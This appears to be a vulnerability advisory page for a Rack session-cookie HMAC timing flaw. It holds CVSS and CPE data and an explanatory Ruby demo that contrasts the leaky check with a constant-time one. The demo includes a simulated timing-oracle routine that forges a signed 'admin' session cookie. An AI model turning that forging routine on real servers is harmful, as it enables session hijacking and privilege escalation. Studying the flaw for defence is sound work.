Description


Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5, 1.3.x before 1.3.10, 1.2.x before 1.2.8, and 1.1.x before 1.1.6 allows remote attackers to guess the session cookie, gain privileges, and execute arbitrary code via a timing attack involving an HMAC comparison function that does not run in constant time.
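The failure mode described above, as an added illustration that is not Rack's own code: a Rack 1.x-style signed cookie (`<base64 payload>--<hex HMAC-SHA1>`), an early-exit comparison standing in for the vulnerable check, a constant-time comparison in the style of the `secure_compare` the fixed releases use, and a simulated timing-oracle attack that recovers a valid HMAC one hex digit at a time against the leaky check and learns nothing against the fixed one. The secret, payloads and the "bytes examined" stand-in for response time are constructed for the example.

```ruby
require 'openssl'

# Constructed, stand-alone illustration; not Rack's own code.
# Cookie format mirrors Rack 1.x Rack::Session::Cookie:
#   "<base64 payload>--<hex HMAC-SHA1 over the base64 payload>"
SECRET = 'constructed-demo-secret'.freeze # hypothetical server-side secret
HEX    = '0123456789abcdef'.freeze

def hmac_hex(data, secret = SECRET)
  OpenSSL::HMAC.hexdigest('SHA1', secret, data)
end

def sign(payload, secret = SECRET)
  data = [payload].pack('m0') # strict base64, no line breaks
  "#{data}--#{hmac_hex(data, secret)}"
end

# Model of the vulnerable check: String#== stops at the first differing byte.
# Returns [equal?, bytes_examined]; the count stands in for the response time an
# attacker measures over the network, which grows with the correct prefix length.
def leaky_compare(a, b)
  return [false, 0] if a.bytesize != b.bytesize
  a.bytes.zip(b.bytes).each_with_index do |(x, y), i|
    return [false, i + 1] if x != y
  end
  [true, a.bytesize]
end

# Constant-time comparison in the style of Rack::Utils.secure_compare, which the
# fixed releases use for the HMAC check: every byte is visited and mismatches are
# OR-accumulated, so the work done does not depend on where the inputs differ.
def constant_time_compare(a, b)
  return [false, 0] if a.bytesize != b.bytesize
  acc = 0
  a.bytes.zip(b.bytes).each { |x, y| acc |= x ^ y }
  [acc.zero?, a.bytesize]
end

LEAKY    = method(:leaky_compare)
CONSTANT = method(:constant_time_compare)

# Server-side verification, parameterised by the comparison in use.
def verify(cookie, compare, secret = SECRET)
  data, digest = cookie.split('--', 2)
  return nil unless data && digest
  equal, _steps = compare.call(digest, hmac_hex(data, secret))
  equal ? data.unpack1('m0') : nil
end

# Timing-oracle attack. +oracle+ plays the server: the attacker submits a
# candidate digest and sees only accept/reject plus the "time" it took.
# Against the leaky comparison this needs at most 16 * 40 queries instead of
# 16**40 guesses; against the constant-time one every candidate ties and the
# attack gives up.
def forge_hmac(data, oracle, secret = SECRET)
  target = hmac_hex(data, secret) # lives on the server; reached only through +oracle+
  guess  = '0' * target.length
  target.length.times do |pos|
    timings = HEX.each_char.map do |c|
      trial = guess.dup
      trial[pos] = c
      equal, steps = oracle.call(trial, target)
      return trial if equal # server accepted the cookie
      [steps, c]
    end
    slowest = timings.max_by(&:first)
    return nil if timings.count { |s, _| s == slowest.first } > 1 # no signal
    guess[pos] = slowest.last
  end
  nil
end

def forge_cookie(payload, oracle, secret = SECRET)
  data = [payload].pack('m0')
  mac  = forge_hmac(data, oracle, secret)
  mac && "#{data}--#{mac}"
end

if __FILE__ == $0
  forged = forge_cookie('{"user":"admin"}', LEAKY)
  puts "forged against leaky check, accepted: #{!verify(forged, CONSTANT).nil?}"
  puts "forged against constant-time check: #{forge_cookie('{"user":"admin"}', CONSTANT).inspect}"
end
```

The attack succeeds against the early-exit check because each hex position has exactly one candidate that makes the server do strictly more work; the forged HMAC is a genuine one, so any verifier accepts it afterwards. Note that a constant-time comparison only closes the timing channel; the "execute arbitrary code" part of the description is still reachable for anyone holding the secret, so rotating it after upgrading is the prudent follow-up.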

Related CPEs

Part: a (application) · Vendor: rack_project · Product: rack · Matching CPE entries: 28

Weaknesses

NVD-CWE-noinfo (NVD placeholder: insufficient information to assign a specific CWE). The description itself points to an observable timing discrepancy in the HMAC comparison.

CVSS impact metrics

CVSS v2.0 base score: 5.1 · Medium
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P (Access Vector: Network; Access Complexity: High; Authentication: None; Confidentiality, Integrity and Availability impact: Partial)

Information

Source identifier: [email protected]
Vulnerability status: Modified
Published: 2013-02-08T20:55:01.640
Last modified: 2023-02-13T04:40:27.140